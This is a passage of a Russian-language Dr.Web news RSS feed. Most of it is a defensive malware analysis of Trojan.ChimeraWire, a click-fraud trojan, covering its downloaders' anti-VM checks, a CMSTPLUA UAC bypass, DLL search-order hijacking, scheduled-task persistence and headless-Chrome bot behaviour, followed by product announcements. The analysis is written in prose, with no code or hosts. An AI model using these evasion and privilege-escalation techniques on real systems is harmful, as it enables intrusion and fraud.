&lt;p&gt;Получив управление, &lt;a href="https://vms.drweb.kz/search/?q=Trojan.DownLoader48.54318&amp;lng=kk"&gt;&lt;b&gt;Trojan.DownLoader48.54318&lt;/b&gt;&lt;/a&gt; проверяет, не работает ли он в искусственной среде. При обнаружении одного из признаков работы в виртуальной машине или в режиме отладки он прекращает работу.&lt;/p&gt;

&lt;p&gt;Если такие признаки не обнаруживаются, троянская библиотека пытается скачать с C2-сервера полезную нагрузку, а также ключи шифрования для ее расшифровки.&lt;/p&gt;

&lt;p&gt;Расшифрованная полезная нагрузка представляет собой ZLIB-контейнер, внутри которого находится шеллкод и исполняемый файл. После расшифровки контейнера &lt;a href="https://vms.drweb.kz/search/?q=Trojan.DownLoader48.54318&amp;lng=kk"&gt;&lt;b&gt;Trojan.DownLoader48.54318&lt;/b&gt;&lt;/a&gt; пытается распаковать его. Если это не удается, то троян самоудаляется, а сам процесс завершает работу. В случае успеха управление передается шеллкоду, задача которого — разжать идущий вместе с ним исполняемый файл. Данный файл является последней стадией заражения — целевым трояном &lt;a href="https://vms.drweb.kz/search/?q=Trojan.ChimeraWire.2" target="_blank"&gt;&lt;b&gt;Trojan.ChimeraWire&lt;/b&gt;&lt;/a&gt;.&lt;/p&gt;

&lt;h3&gt;Вторая цепочка заражения&lt;/h3&gt;

&lt;p&gt;Вторая цепочка начинается с вредоносной программы &lt;a href="https://vms.drweb.kz/search/?q=Trojan.DownLoader48.61444&amp;lng=kk"&gt;&lt;b&gt;Trojan.DownLoader48.61444&lt;/b&gt;&lt;/a&gt;. При запуске она проверяет наличие прав администратора и при их отсутствии пытается их получить. Троян использует технику Masquerade PEB для обхода системы защиты, маскируясь под легитимный процесс &lt;span class="string"&gt;explorer.exe&lt;/span&gt;.&lt;/p&gt;

&lt;p&gt;Затем он вносит патч в копию системной библиотеки &lt;span class="string"&gt;%SystemRoot%\System32\ATL.dll&lt;/span&gt;. Для этого &lt;a href="https://vms.drweb.kz/search/?q=Trojan.DownLoader48.61444&amp;lng=kk"&gt;&lt;b&gt;Trojan.DownLoader48.61444&lt;/b&gt;&lt;/a&gt; считывает ее содержимое, добавляет в нее расшифрованный байт-код и путь до своего файла, после чего сохраняет модифицированную версию в виде файла &lt;span class="string"&gt;dropper&lt;/span&gt; в той же директории, где он расположен. Далее троян инициализирует объекты COM-модели оболочки Windows для сервиса &lt;span class="string"&gt;%SystemRoot%\System32\wbem&lt;/span&gt; и измененной библиотеки. Если инициализация проходит успешно, &lt;a href="https://vms.drweb.kz/search/?q=Trojan.DownLoader48.61444&amp;lng=kk"&gt;&lt;b&gt;Trojan.DownLoader48.61444&lt;/b&gt;&lt;/a&gt; пытается получить права администратора через использование COM-интерфейса CMSTPLUA, эксплуатируя уязвимость, характерную для некоторых старых COM-интерфейсов.&lt;/p&gt;

&lt;p&gt;В случае успеха модифицированная библиотека &lt;span class="string"&gt;dropper&lt;/span&gt; копируется в каталог &lt;span class="string"&gt;%SystemRoot%\System32\wbem&lt;/span&gt; в виде файла &lt;span class="string"&gt;ATL.dll&lt;/span&gt;. После этого &lt;a href="https://vms.drweb.kz/search/?q=Trojan.DownLoader48.61444&amp;lng=kk"&gt;&lt;b&gt;Trojan.DownLoader48.61444&lt;/b&gt;&lt;/a&gt; запускает системную оснастку управления WMI &lt;span class="string"&gt;WmiMgmt.msc&lt;/span&gt;. В результате происходит эксплуатация уязвимости DLL Search Order Hijacking в системном приложении &lt;span class="string"&gt;mmc.exe&lt;/span&gt;, которое автоматически загружает библиотеку &lt;span class="string"&gt;%SystemRoot%\System32\wbem\ATL.dll&lt;/span&gt; с патчем. Она, в свою очередь, повторно запускает &lt;a href="https://vms.drweb.kz/search/?q=Trojan.DownLoader48.61444&amp;lng=kk"&gt;&lt;b&gt;Trojan.DownLoader48.61444&lt;/b&gt;&lt;/a&gt;, но уже с правами администратора.&lt;/p&gt;

&lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a class="preview" href="https://st.drweb.kz/static/new-www/news/2025/december/chimera_wire/02_Trojan.DownLoader48.61444_noadmin_ru.png"&gt;
        &lt;img src="https://st.drweb.kz/static/new-www/news/2025/december/chimera_wire/02_Trojan.DownLoader48.61444_noadmin_ru.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Схема работы &lt;a href="https://vms.drweb.kz/search/?q=Trojan.DownLoader48.61444&amp;lng=kk"&gt;&lt;b&gt;Trojan.DownLoader48.61444&lt;/b&gt;&lt;/a&gt; при отсутствии прав администратора&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;При запуске от имени администратора &lt;a href="https://vms.drweb.kz/search/?q=Trojan.DownLoader48.61444&amp;lng=kk"&gt;&lt;b&gt;Trojan.DownLoader48.61444&lt;/b&gt;&lt;/a&gt; исполняет несколько PowerShell-скриптов для скачивания полезной нагрузки с C2-сервера. Одним из загружаемых объектов является ZIP-архив &lt;span class="string"&gt;one.zip&lt;/span&gt;. В нем находятся файлы, аналогичные файлам из архива &lt;span class="string"&gt;onedrive.zip&lt;/span&gt; из первой цепочки (в частности, легитимная программа &lt;span class="string"&gt;OneDrivePatcher.exe&lt;/span&gt; и вредоносная библиотека &lt;span class="string"&gt;UpdateRingSettings.dll&lt;/span&gt; — &lt;a href="https://vms.drweb.kz/search/?q=Trojan.DownLoader48.54318&amp;lng=kk"&gt;&lt;b&gt;Trojan.DownLoader48.54318&lt;/b&gt;&lt;/a&gt;).&lt;/p&gt;

&lt;p&gt;&lt;a href="https://vms.drweb.kz/search/?q=Trojan.DownLoader48.61444&amp;lng=kk"&gt;&lt;b&gt;Trojan.DownLoader48.61444&lt;/b&gt;&lt;/a&gt; распаковывает архив и в системном планировщике создает задачу на автозапуск &lt;span class="string"&gt;OneDrivePatcher.exe&lt;/span&gt; при загрузке системы. Троян также непосредственно запускает это приложение. Так же, как и в первой цепочке, при запуске в &lt;span class="string"&gt;OneDrivePatcher.exe&lt;/span&gt; происходит эксплуатация уязвимости DLL Search Order Hijacking и автоматическая загрузка троянской библиотеки &lt;span class="string"&gt;UpdateRingSettings.dll&lt;/span&gt;. Далее цепочка заражения повторяет первый сценарий.&lt;/p&gt;

&lt;p&gt;При этом &lt;a href="https://vms.drweb.kz/search/?q=Trojan.DownLoader48.61444&amp;lng=kk"&gt;&lt;b&gt;Trojan.DownLoader48.61444&lt;/b&gt;&lt;/a&gt; скачивает и второй ZIP-архив: &lt;span class="string"&gt;two.zip&lt;/span&gt;. В нем находится вредоносный скрипт &lt;a href="https://vms.drweb.kz/search/?q=Python.Downloader.208&amp;lng=kk"&gt;&lt;b&gt;Python.Downloader.208&lt;/b&gt;&lt;/a&gt; (&lt;span class="string"&gt;update.py&lt;/span&gt;), а также файлы, необходимые для его запуска. Среди них — &lt;span class="string"&gt;Guardian.exe&lt;/span&gt; — переименованный консольный интерпретатор языка Python &lt;span class="string"&gt;pythonw.exe&lt;/span&gt;.&lt;/p&gt;

&lt;p&gt;После распаковки архива &lt;a href="https://vms.drweb.kz/search/?q=Trojan.DownLoader48.61444&amp;lng=kk"&gt;&lt;b&gt;Trojan.DownLoader48.61444&lt;/b&gt;&lt;/a&gt; создает в системном планировщике задачу на автозапуск &lt;span class="string"&gt;Guardian.exe&lt;/span&gt; при загрузке системы. Кроме того, он непосредственно исполняет через это приложение вредоносный скрипт &lt;a href="https://vms.drweb.kz/search/?q=Python.Downloader.208&amp;lng=kk"&gt;&lt;b&gt;Python.Downloader.208&lt;/b&gt;&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;Частично дублируя первую цепочку заражения, злоумышленники, по всей видимости, стремились повысить вероятность успешной загрузки &lt;a href="https://vms.drweb.kz/search/?q=Trojan.ChimeraWire.2" target="_blank"&gt;&lt;b&gt;Trojan.ChimeraWire&lt;/b&gt;&lt;/a&gt; в целевые системы.&lt;/p&gt;

&lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a class="preview" href="https://st.drweb.kz/static/new-www/news/2025/december/chimera_wire/03_Trojan.DownLoader48.61444_admin_ru.png"&gt;
        &lt;img src="https://st.drweb.kz/static/new-www/news/2025/december/chimera_wire/03_Trojan.DownLoader48.61444_admin_ru.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Схема работы &lt;a href="https://vms.drweb.kz/search/?q=Trojan.DownLoader48.61444&amp;lng=kk"&gt;&lt;b&gt;Trojan.DownLoader48.61444&lt;/b&gt;&lt;/a&gt; с правами администратора&lt;/em&gt;&lt;/p&gt;

&lt;h3&gt;Trojan.ChimeraWire&lt;/h3&gt;

&lt;blockquote&gt;&lt;a href="https://vms.drweb.kz/search/?q=Trojan.ChimeraWire.2" target="_blank"&gt;&lt;b&gt;Trojan.ChimeraWire&lt;/b&gt;&lt;/a&gt; получил свое имя на основе сочетания слов «chimera» (в переводе с англ. «химера» — мифическое существо с частями тел нескольких животных) и «wire» (в переводе с англ. «провод»). Слово «chimera» описывает гибридную природу применяемых злоумышленниками методик: использование троянов-загрузчиков, написанных на разных языках, а также антиотладочные техники и эскалация привилегий в процессе заражения. Кроме того, оно отражает то, что троян представляет собой комбинацию различных фреймворков, плагинов и легального ПО, через которое осуществляется скрытое управление трафиком. Отсюда вытекает второе слово «wire»: оно отсылает к невидимой и вредоносной работе трояна с сетью.&lt;/blockquote&gt;

&lt;p&gt;Попадая на целевой компьютер, &lt;a href="https://vms.drweb.kz/search/?q=Trojan.ChimeraWire.2" target="_blank"&gt;&lt;b&gt;Trojan.ChimeraWire&lt;/b&gt;&lt;/a&gt; скачивает со стороннего сайта ZIP-архив &lt;span class="string"&gt;chrome-win.zip&lt;/span&gt; с браузером Google Chrome для ОС Windows. Отметим, что на этом ресурсе также хранятся архивы со сборками Google Chrome и для других систем, таких как Linux и macOS — в том числе для различных аппаратных платформ.&lt;/p&gt;

&lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a class="preview" href="https://st.drweb.kz/static/new-www/news/2025/december/chimera_wire/04_chrome_download.png"&gt;
        &lt;img src="https://st.drweb.kz/static/new-www/news/2025/december/chimera_wire/04_chrome_download.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Сайт с различными сборками браузера Google Chrome, откуда троян загружает необходимый архив&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;После скачивания браузера &lt;a href="https://vms.drweb.kz/search/?q=Trojan.ChimeraWire.2" target="_blank"&gt;&lt;b&gt;Trojan.ChimeraWire&lt;/b&gt;&lt;/a&gt; пытается незаметно установить в него расширения NopeCHA и Buster, предназначенные для автоматизированного распознавания капчи (CAPTCHA). Данные расширения будут в дальнейшем использоваться трояном в процессе его работы.&lt;/p&gt;

&lt;p&gt;Далее он запускает браузер в режиме отладки без видимого окна, что позволяет выполнять вредоносную деятельность, не привлекая внимания пользователя. После этого происходит подключение к выбранному автоматически порту отладки по протоколу WebSocket.&lt;/p&gt;

&lt;p&gt;Вслед за этим троян переходит к получению заданий. Он отправляет запрос на C2-сервер и получает в ответ base64-строку, в которой скрыта зашифрованная алгоритмом AES-GCM конфигурация в формате JSON.&lt;/p&gt;

&lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a class="preview" href="https://st.drweb.kz/static/new-www/news/2025/december/chimera_wire/05_config.png"&gt;
        &lt;img src="https://st.drweb.kz/static/new-www/news/2025/december/chimera_wire/05_config.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Пример конфигурации, которую трояну передает C2-сервер&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;В ней находятся задания и связанные с ними параметры:&lt;/p&gt;
&lt;ul class="list"&gt;
    &lt;li&gt;целевая поисковая система (поддерживаются системы Google и Bing);&lt;/li&gt;
    &lt;li&gt;ключевые фразы для поиска сайтов в заданной поисковой системе и их последующего открытия;&lt;/li&gt;
    &lt;li&gt;максимальное количество последовательных переходов по веб-страницам;&lt;/li&gt;
    &lt;li&gt;случайные распределения для выполнения автоматических кликов на веб-страницах;&lt;/li&gt;
    &lt;li&gt;время ожидания загрузки страниц;&lt;/li&gt;
    &lt;li&gt;целевые домены.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Для дополнительной имитации деятельности реального человека и обхода систем, отслеживающих постоянную активность, в конфигурации также предусмотрены параметры, отвечающие за паузы между сессиями работы.&lt;/p&gt;

&lt;h3&gt;Имитация кликов мышью пользователем&lt;/h3&gt;

&lt;p&gt;&lt;a href="https://vms.drweb.kz/search/?q=Trojan.ChimeraWire.2" target="_blank"&gt;&lt;b&gt;Trojan.ChimeraWire&lt;/b&gt;&lt;/a&gt; способен выполнять клики следующих видов:&lt;/p&gt;
&lt;ul class="list"&gt;
    &lt;li&gt;для навигации по поисковой выдаче;&lt;/li&gt;
    &lt;li&gt;для открытия найденных релевантных ссылок в новых фоновых вкладках.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Вначале &lt;a href="https://vms.drweb.kz/search/?q=Trojan.ChimeraWire.2" target="_blank"&gt;&lt;b&gt;Trojan.ChimeraWire&lt;/b&gt;&lt;/a&gt; через нужную поисковую систему выполняет поиск сайтов по доменам и ключевым фразам, указанным в конфигурации. Далее он открывает полученные в поисковой выдаче сайты и находит на них все HTML-элементы, которые определяют гиперссылки. Троян помещает их в массив данных и перемешивает его, чтобы объекты в нем располагались в последовательности, отличной от последовательности на веб-странице. Это делается для обхода антибот-защиты сайтов, которая может отслеживать порядок нажатий.&lt;/p&gt;

&lt;p&gt;Затем &lt;a href="https://vms.drweb.kz/search/?q=Trojan.ChimeraWire.2" target="_blank"&gt;&lt;b&gt;Trojan.ChimeraWire&lt;/b&gt;&lt;/a&gt; проверяет, работоспособны ли найденные ссылки и совпадают ли строки в них с заданным шаблоном из конфигурации, после чего подсчитывает общее количество совпадений. Дальнейшие действия трояна зависят от получившегося числа.&lt;/p&gt;

&lt;p&gt;Если на странице было выявлено достаточное количество подходящих ссылок, &lt;a href="https://vms.drweb.kz/search/?q=Trojan.ChimeraWire.2" target="_blank"&gt;&lt;b&gt;Trojan.ChimeraWire&lt;/b&gt;&lt;/a&gt; сканирует страницу и сортирует найденные ссылки по релевантности (наиболее соответствующие ключевым словам ссылки идут первыми). После этого выполняется клик по одной или нескольким подходящим ссылкам.&lt;/p&gt;

&lt;p&gt;Если же совпадений с заданным шаблоном недостаточно или их нет вовсе, вредоносная программа использует алгоритм с вероятностной моделью поведения, который максимально имитирует действия настоящего пользователя. На основе параметров из конфигурации при помощи взвешенного случайного распределения &lt;a href="https://vms.drweb.kz/search/?q=Trojan.ChimeraWire.2" target="_blank"&gt;&lt;b&gt;Trojan.ChimeraWire&lt;/b&gt;&lt;/a&gt; определяет количество ссылок, по которым необходимо перейти. Например, распределение &lt;span class="string"&gt;["1:90", "2:10"]&lt;/span&gt; означает, что &lt;a href="https://vms.drweb.kz/search/?q=Trojan.ChimeraWire.2" target="_blank"&gt;&lt;b&gt;Trojan.ChimeraWire&lt;/b&gt;&lt;/a&gt; кликнет 1 ссылку с вероятностью 90%, и 2 ссылки — с вероятностью 20%. Таким образом, с большой долей вероятности вредоносная программа должна перейти по одной ссылке. Троян случайным образом выбирает ссылку из составленного ранее массива и выполняет клик.&lt;/p&gt;

&lt;p&gt;После каждого перехода по ссылке из поисковой выдачи и выполнения кликов на загружаемой странице троян, в зависимости от задачи, возвращается на предыдущую вкладку или переходит к следующей. Алгоритм действий повторяется до тех пор, пока не будет исчерпан лимит по кликам для целевых веб-сайтов.&lt;/p&gt;

&lt;p&gt;Ниже представлены примеры сайтов, параметры для взаимодействия с которыми поступали трояну в заданиях от C2-сервера:&lt;/p&gt;
&lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a class="preview" href="https://st.drweb.kz/static/new-www/news/2025/december/chimera_wire/06_website.png"&gt;
        &lt;img src="https://st.drweb.kz/static/new-www/news/2025/december/chimera_wire/06_website.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a class="preview" href="https://st.drweb.kz/static/new-www/news/2025/december/chimera_wire/07_website.png"&gt;
        &lt;img src="https://st.drweb.kz/static/new-www/news/2025/december/chimera_wire/07_website.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;div class="column_grid_review column_grid_review--o" style="margin-bottom: 12px;"&gt;
    &lt;a class="preview" href="https://st.drweb.kz/static/new-www/news/2025/december/chimera_wire/08_website.png"&gt;
        &lt;img src="https://st.drweb.kz/static/new-www/news/2025/december/chimera_wire/08_website.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;Подробные технические описания трояна &lt;b&gt;ChimeraWire&lt;/b&gt; и вредоносных программ, участвующих в его загрузке, находятся в PDF-версии исследования и в вирусной библиотеке компании «Доктор Веб».&lt;/p&gt;

&lt;p&gt;
    Подробнее о &lt;a href="https://vms.drweb.kz/search/?q=Trojan.ChimeraWire.2" target="_blank"&gt;&lt;b&gt;Trojan.ChimeraWire&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;
    Подробнее о &lt;a href="https://vms.drweb.kz/search/?q=Trojan.DownLoader48.54600&amp;lng=kk"&gt;&lt;b&gt;Trojan.DownLoader48.54600&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;
    Подробнее о &lt;a href="https://vms.drweb.kz/search/?q=Trojan.Starter.8377&amp;lng=kk"&gt;&lt;b&gt;Trojan.Starter.8377&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;
    Подробнее о &lt;a href="https://vms.drweb.kz/search/?q=Python.Downloader.208&amp;lng=kk"&gt;&lt;b&gt;Python.Downloader.208&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;
    Подробнее о &lt;a href="https://vms.drweb.kz/search/?q=Trojan.DownLoader48.54318&amp;lng=kk"&gt;&lt;b&gt;Trojan.DownLoader48.54318&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;
    Подробнее о &lt;a href="https://vms.drweb.kz/search/?q=Trojan.DownLoader48.61444&amp;lng=kk"&gt;&lt;b&gt;Trojan.DownLoader48.61444&lt;/b&gt;&lt;/a&gt; 
&lt;/p&gt;

&lt;h3&gt;Заключение&lt;/h3&gt;

&lt;p&gt;В настоящее время вредоносная деятельность &lt;a href="https://vms.drweb.kz/search/?q=Trojan.ChimeraWire.2" target="_blank"&gt;&lt;b&gt;Trojan.ChimeraWire&lt;/b&gt;&lt;/a&gt; фактически сводится к выполнению относительно простых задач кликера по накрутке популярности веб-сайтов. Вместе с тем, функциональные возможности лежащих в его основе утилит позволяют трояну решать более широкий спектр задач — в том числе совершать автоматизированные действия под видом активности настоящих пользователей. Так, с его помощью злоумышленники могут заполнять веб-формы — например, на сайтах, проводящих опросы в рекламных целях. Кроме того, они могут использовать его для считывания содержимого веб-страниц и создания их скриншотов — как с целью кибершпионажа, так и для автоматического сбора информации для наполнения различных баз данных (например, с почтовыми адресами, номерами телефонов и т. п.).&lt;/p&gt;

&lt;p&gt;Таким образом, в будущем возможно появление новых версий &lt;a href="https://vms.drweb.kz/search/?q=Trojan.ChimeraWire.2" target="_blank"&gt;&lt;b&gt;Trojan.ChimeraWire&lt;/b&gt;&lt;/a&gt;, где эти и другие функции будут реализованы в полной мере. Специалисты компании «Доктор Веб» продолжают следить за развитием этого трояна.&lt;/p&gt;

&lt;h3&gt;MITRE ATT&amp;CK®&lt;/h3&gt;

&lt;div class="table-news-secondary"&gt;
 &lt;table&gt;
    &lt;thead&gt;
        &lt;tr&gt;
            &lt;th&gt;&lt;b&gt;Этап&lt;/b&gt;&lt;/th&gt;
            &lt;th&gt;&lt;b&gt;Техника&lt;/b&gt;&lt;/th&gt;
        &lt;/tr&gt;
    &lt;/thead&gt;
    &lt;tbody&gt;
        &lt;tr&gt;
            &lt;td&gt;Выполнение&lt;/td&gt;
            &lt;td&gt;Выполнение с участием пользователя (T1204)&lt;br /&gt;&lt;br /&gt;Вредоносный файл (T1204.002)&lt;br /&gt;&lt;br /&gt;Вредоносная библиотека (T1204.005)&lt;br /&gt;&lt;br /&gt;PowerShell (T1059.001)&lt;br /&gt;&lt;br /&gt;Командная оболочка Windows (T1059.003)&lt;br /&gt;&lt;br /&gt;Visual Basic (T1059.005)&lt;br /&gt;&lt;br /&gt;Python (T1059.006)&lt;br /&gt;&lt;br /&gt;Планировщик заданий Windows (T1053.005)&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;Закрепление&lt;/td&gt;
            &lt;td&gt;Ключи запуска в реестре Windows / Каталог автозагрузки (T1547.001)&lt;br /&gt;&lt;br /&gt;Запланированная задача / задание (T1053)&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;Повышение привилегий&lt;/td&gt;
            &lt;td&gt;Перехват потока исполнения: перехват поиска DLL (T1574.001)&lt;br /&gt;&lt;br /&gt;Обход контроля учетных записей (T1548.002)&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;Предотвращение обнаружения&lt;/td&gt;
            &lt;td&gt;Зашифрованный / закодированный файл (T1027.013)&lt;br /&gt;&lt;br /&gt;Уклонение от отладки (T1622)&lt;br /&gt;&lt;br /&gt;Скрытое окно (T1564.003)&lt;br /&gt;&lt;br /&gt;Исключения для файла или пути (T1564.012)&lt;br /&gt;&lt;br /&gt;Деобфускация / декодирование файлов или данных (T1140)&lt;br /&gt;&lt;br /&gt;Перехват потока исполнения: перехват поиска DLL (T1574.001)&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;Организация управления&lt;/td&gt;
            &lt;td&gt;Двусторонняя связь (T1102.002)&lt;br /&gt;&lt;br /&gt;Веб-протоколы (T1071.001)&lt;/td&gt;
        &lt;/tr&gt;
    &lt;/tbody&gt;
 &lt;/table&gt;
&lt;/div&gt;

&lt;a href="https://github.com/DoctorWebLtd/malware-iocs/blob/master/Trojan.ChimeraWire/README.adoc" target="_blank"&gt;Индикаторы компрометации&lt;/a&gt;</description></item><item><guid>https://news.drweb.kz/show/?i=15087&amp;lng=kk</guid><title>Черная пятница: скидка 40% на комплексную защиту Dr.Web</title><link>https://news.drweb.kz/show/?i=15087&amp;lng=kk&amp;c=5</link><pubDate>Wed, 26 Nov 2025 03:41:16 GMT</pubDate><description>&lt;p&gt;&lt;newslead&gt;С 26 ноября по 3 декабря 2025 года вы можете приобрести антивирусную защиту для компьютеров и мобильных устройств со скидкой 40%.&lt;/newslead&gt;&lt;/p&gt;&lt;p&gt;Сезон распродаж — время не только выгодных покупок, но и активности киберпреступников. В этот период растет число фишинговых атак, вредоносных приложений и попыток кражи платежных данных.&lt;br&gt;Решения Dr.Web помогут вам оставаться в безопасности!&lt;/p&gt;&lt;h3&gt;Акция распространяется на:&lt;/h3&gt;&lt;p&gt;&lt;strong&gt;Dr.Web Security Space — защита персональных компьютеров&lt;/strong&gt;&lt;/p&gt;&lt;ul&gt;&lt;li&gt;блокирует вредоносные программы и шпионское ПО&lt;/li&gt;&lt;li&gt;защищает онлайн‑платежи и конфиденциальные данные&lt;/li&gt;&lt;li&gt;фильтрует фишинговые письма и предупреждает о мошеннических сайтах&lt;/li&gt;&lt;li&gt;не замедляет работу устройств&amp;nbsp;&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;&lt;strong&gt;Dr.Web Security Space для мобильных устройств — защита мобильных устройств, планшетов, Smart TV и игровых консолей&lt;/strong&gt;&lt;/p&gt;&lt;ul&gt;&lt;li&gt;непрерывно защищает от всех типов вредоносных программ&lt;/li&gt;&lt;li&gt;блокирует нежелательные звонки и СМС-спам&lt;/li&gt;&lt;li&gt;обеспечивает безопасность персональных данных, банковских операций и онлайн-покупок&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;Срок проведения акции: 26 ноября — 3 декабря 2025 года&lt;br&gt;&amp;nbsp;&lt;/p&gt;</description></item><item><guid>https://news.drweb.kz/show/?i=15084&amp;lng=kk</guid><title>Dr.Web CureIt! теперь видит то, что пытается скрыть вредоносное программное обеспечение</title><link>https://news.drweb.kz/show/?i=15084&amp;lng=kk&amp;c=5</link><pubDate>Thu, 20 Nov 2025 08:00:25 GMT</pubDate><description>&lt;p&gt;&lt;newslead&gt;Компания «Доктор Веб» выпустила обновление для бесплатной утилиты Dr.Web CureIt!, наделив её уникальной функцией — возможностью проверять файлы и папки, внесённые вирусописателями в список исключений антивирусных программ. Это серьёзный шаг в борьбе со сложными угрозами, которые целенаправленно отключают системы защиты для беспрепятственной работы в системе.&lt;/newslead&gt;&lt;/p&gt;&lt;p&gt;Новая функция стала прямым следствием успешной работы другого продукта компании — Dr.Web FixIt!, применяемого специалистами компании для расследования инцидентов и лечения сложных заражений. Многие вредоносные программы, попав на компьютер, первым делом пытаются внести собственные исполняемые файлы в список исключений антивирусной защиты, что делает систему уязвимой: антивирусное ПО, будучи обманутым, игнорирует вредоносные объекты, позволяя злоумышленникам беспрепятственно красть данные, шифровать файлы или использовать ресурсы компьютера в бот-сетях.&lt;/p&gt;&lt;p&gt;Как работает новая функция:&lt;/p&gt;&lt;ol&gt;&lt;li&gt;При запуске проверки Dr.Web CureIt! теперь автоматически считывает и анализирует списки исключений установленного или встроенного антивируса.&lt;/li&gt;&lt;li&gt;Все файлы и папки, найденные в этих списках, подвергаются тщательной проверке с помощью антивирусного ядра Dr.Web.&lt;/li&gt;&lt;li&gt;Если в исключениях обнаруживается вредоносный объект, Dr.Web CureIt! уведомляет пользователя и удаляет угрозу.&lt;/li&gt;&lt;/ol&gt;&lt;p&gt;Это нововведение критически важно для обычных пользователей, которые могут не подозревать, что их система защиты была скомпрометирована. Теперь, даже если вирус попытается спрятаться «на виду», Dr.Web CureIt! сможет его найти и обезвредить.&lt;/p&gt;&lt;h3&gt;Планы на будущее: скорая экспертная помощь для Linux&lt;/h3&gt;&lt;p&gt;Опираясь на успешный опыт применения сервиса Dr.Web FixIt! для Windows, «Доктор Веб» также готовится к выпуску полноценной версии сервиса для Linux, который нацелен на помощь ИБ-специалистам в расследовании кибератак на корпоративную инфраструктуру.&lt;br&gt;Сейчас вы можете использовать утилиту Dr.Web FixIt! для Linux для отправки информации о системе в нашу техническую поддержку.Утилита &amp;nbsp;теперь расположена на новой странице - &lt;a href="https://free.drweb.ru/sysinfo/"&gt;https://free.drweb.ru/sysinfo/&lt;/a&gt;&amp;nbsp;&lt;br&gt;В дальнейшем, наработки, полученные в этой версии, позволят создать утилиту Dr.Web CureIt! и для обычных пользователей, которые смогут быстро проверить и вылечить свои ПК под управлением Linux от последствий заражения.&lt;/p&gt;&lt;p&gt;Скачать обновлённую версию Dr.Web CureIt! можно бесплатно* на официальном сайте: &lt;a href="https://free.drweb.ru/download+cureit+free/"&gt;https://free.drweb.ru/download+cureit+free/&lt;/a&gt;&lt;/p&gt;&lt;p&gt;*Бесплатно только для персонального использования.&lt;br&gt;&amp;nbsp;&lt;/p&gt;</description></item><item><guid>https://news.drweb.kz/show/?i=15080&amp;lng=kk</guid><title>Выпущено обновление серверов централизованного управления Dr.Web Enterprise Security Suite и Dr.Web Industrial</title><link>https://news.drweb.kz/show/?i=15080&amp;lng=kk&amp;c=5</link><pubDate>Fri, 07 Nov 2025 10:00:00 GMT</pubDate><description>&lt;newslead&gt;Вышло обновление серверов Dr.Web Enterprise Security Suite и Dr.Web Industrial. Новая версия включает улучшения стабильности и новые инструменты централизованного управления действиями при обнаружении угроз на устройствах под управлением Android. Для получения всех преимуществ и корректной работы системы пользователям рекомендуется обновить серверы до актуальной версии.&lt;/newslead&gt;&lt;p&gt;В новой версии сервера Dr.Web Enterprise Security Suite реализованы изменения, направленные на повышение управляемости системы защиты. Также изменения произошли и в рамках продукта для защиты мобильных устройств под управлением ОС Android, что обеспечивает полноценный контроль антивирусной защиты со стороны Центра управления.&lt;/p&gt;&lt;p&gt;Данное обновление добавляет возможность централизованно управлять действиями компонентов Сканер и SpIDer Guard при обнаружении различных типов угроз на устройствах под управлением ОС Android. Теперь администратор может задать, как агент Dr.Web будет реагировать на угрозы — уведомлять, удалять или игнорировать их в зависимости от категории.&lt;/p&gt;&lt;p&gt;Настройки, ранее представленные как параметры «Проверять на наличие рекламных программ» и «Проверять на наличие потенциально опасных программ», заменены новым механизмом выбора действий. Если эти проверки были отключены, после обновления по умолчанию к соответствующим программам будет применяться действие «Игнорировать». В остальных случаях используется действие «Сообщать».&lt;/p&gt;&lt;div class="alert"&gt;&lt;p&gt;&lt;strong&gt;Важно для пользователей&amp;nbsp;&lt;/strong&gt;&lt;/p&gt;&lt;/div&gt;&lt;p&gt;Чтобы воспользоваться всеми возможностями новой версии и обеспечить корректную работу компонентов защиты, необходимо обновить серверы централизованного управления до актуальной версии.&lt;br&gt;Обновление доступно для загрузки через веб-интерфейс консоли управления.&lt;br&gt;При возникновении вопросов по настройке или планированию обновления администраторы антивирусных сетей могут обратиться за консультацией в Службу технической поддержки.&lt;br&gt;&amp;nbsp;&lt;/p&gt;</description></item><item><guid>https://news.drweb.kz/show/?i=15079&amp;lng=kk</guid><title>Обновленная версия Dr.Web для мобильных устройств с умной системой защиты</title><link>https://news.drweb.kz/show/?i=15079&amp;lng=kk&amp;c=5</link><pubDate>Fri, 07 Nov 2025 09:00:00 GMT</pubDate><description>&lt;newslead&gt;Вышел релиз антивирусных продуктов для защиты смартфонов, планшетов и других устройств на базе ОС Android. Основные улучшения касаются автоматизации защиты и стабильности работы.&lt;/newslead&gt;&lt;h3&gt;Что делает этот релиз 